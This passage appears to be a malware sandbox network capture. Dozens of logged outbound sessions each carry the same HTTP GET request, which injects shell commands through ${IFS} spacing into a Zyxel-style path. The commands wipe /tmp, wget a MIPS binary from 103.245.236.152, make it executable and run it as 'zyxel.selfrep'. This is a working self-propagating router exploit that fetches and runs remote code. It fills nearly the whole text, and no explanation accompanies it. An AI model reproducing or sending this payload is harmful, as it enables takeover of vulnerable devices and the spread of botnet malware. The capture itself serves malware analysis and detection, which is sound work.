                                      Jan 14, 2024 15:50:06.780556917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      194192.168.2.1441956176.220.132.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780627012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      195192.168.2.1451190143.151.248.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780632973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      196192.168.2.1447140135.56.17.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780689955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      197192.168.2.145601284.165.2.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780751944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      198192.168.2.145209081.170.67.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780761957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      199192.168.2.1448156184.99.151.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780798912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      200192.168.2.144041432.229.182.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780858040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      201192.168.2.143774057.207.246.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780886889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      202192.168.2.144128218.142.32.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780950069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      203192.168.2.1443432140.89.41.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.780975103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      204192.168.2.1442068126.213.86.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781034946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      205192.168.2.1435422134.22.103.20443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781060934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      206192.168.2.1457816110.186.100.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781095982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      207192.168.2.1457846179.105.147.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781155109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      208192.168.2.1448282125.227.38.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781166077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      209192.168.2.1438374223.191.24.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781219006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      210192.168.2.1447380163.205.161.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781260014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      211192.168.2.145358264.170.85.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781291962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      212192.168.2.1454182142.72.101.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781327009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      213192.168.2.1453280177.229.68.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781383038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      214192.168.2.145926223.38.11.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781441927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      215192.168.2.1439200171.62.236.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781475067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      216192.168.2.1448470191.131.167.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781527042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      217192.168.2.1443140159.49.240.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781585932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      218192.168.2.1457238111.246.255.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781624079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      219192.168.2.143933265.207.123.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781672001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      220192.168.2.14487885.212.10.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781713963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      221192.168.2.1447014137.135.250.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781739950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      222192.168.2.1438778171.114.67.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781816006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      223192.168.2.1457712136.153.152.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781852961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      224192.168.2.1445350128.119.232.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781897068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      225192.168.2.145620266.213.104.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781922102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      226192.168.2.145479641.120.128.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.781981945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      227192.168.2.144510660.80.206.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782027006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      228192.168.2.144408031.4.143.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782075882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      229192.168.2.1451050160.123.193.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782107115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      230192.168.2.1450362103.173.212.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782176971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      231192.168.2.1457652153.2.88.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782211065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      232192.168.2.1448870173.172.93.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782262087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      233192.168.2.145416269.32.111.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782305002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      234192.168.2.1460576110.131.97.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782370090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      235192.168.2.144291866.105.197.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782407999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      236192.168.2.144322291.63.111.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782450914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      237192.168.2.146008249.44.27.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782485008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      238192.168.2.144233620.124.97.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782532930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      239192.168.2.144866024.147.146.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782593012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      240192.168.2.1445786159.108.32.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782602072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      241192.168.2.145515450.126.35.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782645941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      242192.168.2.143631245.219.65.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782684088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      243192.168.2.145187260.203.249.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782742023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      244192.168.2.1458128100.63.125.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.782782078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      245192.168.2.144654659.4.64.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783111095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      246192.168.2.1449196140.245.184.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783160925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      247192.168.2.1433196178.127.102.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783210993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      248192.168.2.145362883.252.158.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783262968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      249192.168.2.1443106107.151.113.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783277035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      250192.168.2.1443462132.85.4.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783278942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      251192.168.2.1441246157.70.28.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783325911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      252192.168.2.144646882.141.228.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783413887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      253192.168.2.1455794139.148.159.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783435106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      254192.168.2.144869671.47.110.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.783440113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      255192.168.2.1452450187.153.131.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.786051989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      256192.168.2.1436934101.146.117.121443
                                      TimestampBytes transferredDirectionData
